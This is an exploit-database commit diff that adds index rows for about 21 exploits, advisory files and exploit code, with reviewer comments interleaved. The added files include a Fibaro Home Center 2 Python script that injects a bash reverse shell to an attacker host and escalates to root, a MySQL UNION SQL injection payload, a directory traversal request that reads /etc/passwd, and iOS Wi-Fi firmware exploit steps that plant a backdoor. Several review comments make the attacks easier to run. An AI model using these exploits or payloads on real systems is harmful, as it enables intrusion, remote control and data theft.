DB: 2017-09-28

21 new exploits

Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Adobe Flash - Out-of-Bounds Read in applyToRange

CyberArk Viewfinity 5.5.10.95 - Privilege Escalation

PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution

Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response

Tiny HTTPd 0.1.0 - Directory Traversal

Free PHP photo Gallery script - Remote File Inclusion
Free PHP Photo Gallery Script - Remote File Inclusion

WordPress Plugin School Management System - SQL Injection
iTech Dating Script 3.40 - SQL Injection
iTech Job Script 9.27 - SQL Injection
WordPress Plugin Content Timeline - SQL Injection
Job Links - Arbitrary File Upload
TicketPlus - Arbitrary File Upload
Photo Fusion - Arbitrary File Upload
SMSmaster - SQL Injection
AMC Master - Arbitrary File Upload
WordPress Plugin WPCHURCH - SQL Injection
WordPress Plugin WPGYM - SQL Injection
WordPress Plugin Hospital Management System - SQL Injection
Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation
WordPress Plugin WPAMS - SQL Injection
This commit is contained in:
Offensive Security 2017-09-28 05:01:27 +00:00
parent a06626c22f
commit ec599357c0
22 changed files with 769 additions and 1 deletions


@ -5685,6 +5685,9 @@ id,file,description,date,author,platform,type,port
42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0 42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0 42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0
42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9215,6 +9218,7 @@ id,file,description,date,author,platform,type,port
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0 42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0
@ -9236,6 +9240,7 @@ id,file,description,date,author,platform,type,port
42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0
42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0 42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0
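Review bot: the new 42537 row is typed `local` but its description says "Remote Code Execution", which mixes two conventions in one line. The neighbouring 42325 row handles the same situation (code execution when the user opens a crafted file) with a file-format title and type `local`; either drop "Remote" from the 42537 title the same way, or, if the vector really is reachable over the network, file it under platforms/windows/remote/ and set the type to match. As written, a reader filtering on type gets one answer and a reader grepping titles gets the other.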
@ -15852,7 +15857,9 @@ id,file,description,date,author,platform,type,port
42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80 42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80 42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0 42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
42784,platforms/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
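Review bot: the 42790 row records port 0, but the advisory's reproduction step is `nc localhost 44123`. If Tiny HTTPd listens on a fixed port, put it in the port column the way the 42778 and 42793 rows do (80, 5858); if 44123 was simply the port the author's instance happened to bind, leaving 0 is right but the advisory text should say so, because as it stands the reader cannot tell which case applies. Minor: the title is "Directory Traversal" here and "Local File Traversal" in the advisory header; pick one and use it in both places.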
@ -24447,7 +24454,7 @@ id,file,description,date,author,platform,type,port
14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0
14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 14438,platforms/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0
14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0
14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0
14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0
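Review bot: this hunk changes 14438's description to "Free PHP Photo Gallery Script" but leaves 14437, the same product from the same author on the same date, as "Free PHP photo Gallery script" on the line directly above. Apply the same capitalisation to 14437 in this commit so the two rows sort and search together; fixing one half of a pair is how these drift apart for years.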
@ -38123,6 +38130,7 @@ id,file,description,date,author,platform,type,port
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
42804,platforms/php/webapps/42804.txt,"WordPress Plugin School Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0 42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
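Review bot: 42804 is inserted between 41714 and 42058, inside a block of 2015 Metasploit rows, while its siblings from the same author and date (42794 to 42805) are appended at the end of the file. Unless there is a reason for this placement, move it next to 42802/42805 so the 2017-09-26 batch stays contiguous. Also note that 42803 appears nowhere in this commit although the batch is otherwise consecutive from 42794 to 42805; if it was deliberately skipped that is fine, but it is worth a check.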
@ -38419,6 +38427,8 @@ id,file,description,date,author,platform,type,port
42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
@ -38565,3 +38575,14 @@ id,file,description,date,author,platform,type,port
42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0 42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0
42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0 42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0 42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0
42794,platforms/php/webapps/42794.txt,"WordPress Plugin Content Timeline - SQL Injection",2017-09-16,"Jeroen - IT Nerdbox",php,webapps,0
42795,platforms/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
42796,platforms/php/webapps/42796.txt,"TicketPlus - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
42797,platforms/php/webapps/42797.txt,"Photo Fusion - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
42798,platforms/php/webapps/42798.txt,"SMSmaster - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42799,platforms/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
42800,platforms/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42801,platforms/php/webapps/42801.txt,"WordPress Plugin WPGYM - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
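Review bot: the Fibaro row carries id 42884, which is out of sequence with every other id in this batch (42794 to 42805) and is also baked into the file name platforms/multiple/webapps/42884.py; the only id missing from the batch is 42803. Confirm 42884 is intended rather than a transposition of 42803 before publication, since renumbering afterwards means moving the file and rewriting the row. The 2017-02-22 date on a row added in a 2017-09-28 commit is presumably the original disclosure date; that is fine, but it makes this the only row in the hunk that is not 2017-09, so a second look does no harm.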


platforms/ios/remote/42784.txt Executable file

@ -0,0 +1,35 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
The exploit gains code execution on the Wi-Fi firmware on the iPhone 7.
The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 (14C92), but should work on all versions of iOS up to 10.3.3 (included). However, some symbols might need to be adjusted for different versions of iOS, see "exploit/symbols.py" for more information.
Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip).
The attached archive contains the following directories:
-hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
instrumented to add various commands, allowing injection and reception of crafted action frames
used throughout the exploit.
-exploit - The exploit itself.
To run the exploit, you must execute the following steps:
-Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
-Compile the provided version of hostapd
-Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
-Configure the following settings under "exploit/conf.py":
-HOSTAPD_DIR - The directory of the hostapd binary compiled above
-TARGET_MAC - The MAC address of the device being exploited
-AP_MAC - The MAC address of your wireless dongle
-INTERFACE - The name of the wireless dongle's interface
-Assemble the backdoor shellcode by running "exploit/assemble_backdoor.sh"
-Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
-Connect the target device to the network
-Run "exploit/attack.py"
Following the steps above should result in installation of a simple backdoor allowing read/write access to the firmware. You can interact with the backdoor to gain R/W access to the firmware by calling the "read_dword" and "write_dword" functions, respectively.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip
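Review bot: the archive URL on the last line is the only thing that makes this advisory reproducible, yet no checksum is recorded for it; with the PoC living in a separate binary repository, a SHA-256 of 42784.zip in this text would let a reader confirm they hold the archive the description was written against. Second, the text says the exploit was tested on 10.2 (14C92) and is expected to work up to 10.3.3, while the files.csv row says "iOS 10.2" only; that is acceptable if the row is read as "tested on", but keep the "exploit/symbols.py" caveat in this text, since adjusting symbols is exactly what a reader on another build has to do. Third, the description states the result is a backdoor in Wi-Fi firmware reachable via action frames; a sentence on how to remove it (reconnect, reboot, or whether it survives until the chip is reset) would help anyone running this against a test device.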


@ -0,0 +1,33 @@
#======================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
# Date: 26-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: Tiny HTTPd
# Version: 0.1.0
# Download Link:
https://sourceforge.net/projects/tinyhttpd/?source=directory
#======================================================================================
# To reproduce the exploit:
# 1. run the #./httpd
# 2. #nc localhost 44123
# GET /../../../../../../../../../../../etc/passwd HTTP/1.1
#==========
#Responce
#==========
HTTP/1.0 200 OK
Server: jdbhttpd/0.1.0
Content-Type: text/html
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
---------------------snip---------------------------
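Review bot: the reproduction step on the `GET /../../../../../../../../../../../etc/passwd HTTP/1.1` line omits the blank line that terminates an HTTP request, so a reader typing it into nc may sit waiting on a server that is still expecting headers; show the trailing empty line, or give a one-liner such as `printf 'GET /../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n' | nc localhost 44123`. The `nc localhost 44123` step does not say where 44123 comes from, and the files.csv row records port 0; state whether the port is fixed or is the one the server reports at startup. Minor: "Responce" should be "Response", and the `Server: jdbhttpd/0.1.0` header in the reply is worth one sentence, because it is the cheapest fingerprint a scanner can use for this exact version.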


@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321
The attached MP4 file causes an out-of-bounds memory access when played in flash player.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip
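Review bot: the one-line description says "out-of-bounds memory access" while the files.csv row commits to "Out-of-Bounds Memory Read in MP4 Parsing"; the text should carry at least the precision of the index entry (read versus write, and which stage of MP4 parsing) so a reader triaging from the text alone reaches the same severity picture. The affected Flash version and the platform it was reproduced on are also absent, leaving everything to the Project Zero link.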


@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322
The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip


@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323
The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip


@ -0,0 +1,45 @@
#!/usr/bin/python
import requests
import argparse
import urllib
import base64
import tarfile
import os
parser = argparse.ArgumentParser(description='Fibaro RCE')
parser.add_argument('--rhost')
parser.add_argument('--lhost')
parser.add_argument('--lport')
args = parser.parse_args()
f = open('run.sh', 'w')
f.write('#!/bin/bash\n')
f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
f.close()
os.chmod('run.sh', 0777)
tar = tarfile.open("root.tar.gz", "w:gz")
tar.add("run.sh")
tar.close()
with open("root.tar.gz", "rb") as tarfile:
tar64 = base64.b64encode(tarfile.read())
wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d > /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz"))
os.remove('run.sh')
os.remove('root.tar.gz')
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Fibaro-Version': '2',
'X-Requested-With': 'XMLHttpRequest',
}
data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=&sectionID=&sectionName=&lang=en'
print "[+] Popping a root shell..."
requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False)
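Review bot: `--rhost`, `--lhost` and `--lport` are declared without `required=True`, so omitting any of them fails with a TypeError on the string concatenation at `f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + ...)` instead of a usage message; add `required=True` to the three `add_argument` calls. Two smaller points in the same file: `with open("root.tar.gz", "rb") as tarfile:` shadows the `tarfile` module imported a few lines earlier (harmless only because the module is not used afterwards; rename the handle), and `verify=False` on a plain `http://` URL does nothing. The script is Python 2 only (`print` statement, `0777` literal, `urllib.quote_plus`), so the `#!/usr/bin/python` shebang should say `python2` or the file should be ported. Finally, a comment should state that the privilege escalation is the `sudo update --manual /tmp/patch.tar.gz` step, because that is what turns the web user's command injection through `cmd1` into a root shell; the script never explains it.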

platforms/php/webapps/42514.txt Executable file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: iTech Dating Script 3.40 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com/
# Version: 3.40
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/see_more_details.php?id=[SQL]
# -48+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
#
# http://localhost/[PATH]/send_gift.php?id=[SQL]
#
# Etc...
# # # # #
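Review bot: the PoC gives a full payload for `see_more_details.php?id=` but lists `send_gift.php?id=` with no payload and then "Etc..."; for the second endpoint at least say whether the same numeric context and the same 29-column `-48+UNION(SELECT ...)` shape apply, otherwise the line gives a reader nothing to act on. The payload is MySQL-specific (`EXPORT_SET`, the `@` user variable), which belongs under "Tested on" next to the operating systems.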

platforms/php/webapps/42515.txt Executable file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: iTech Job Script 9.27 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/job-portal-script/
# Demo: http://job-portal.itechscripts.com/
# Version: 9.27
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
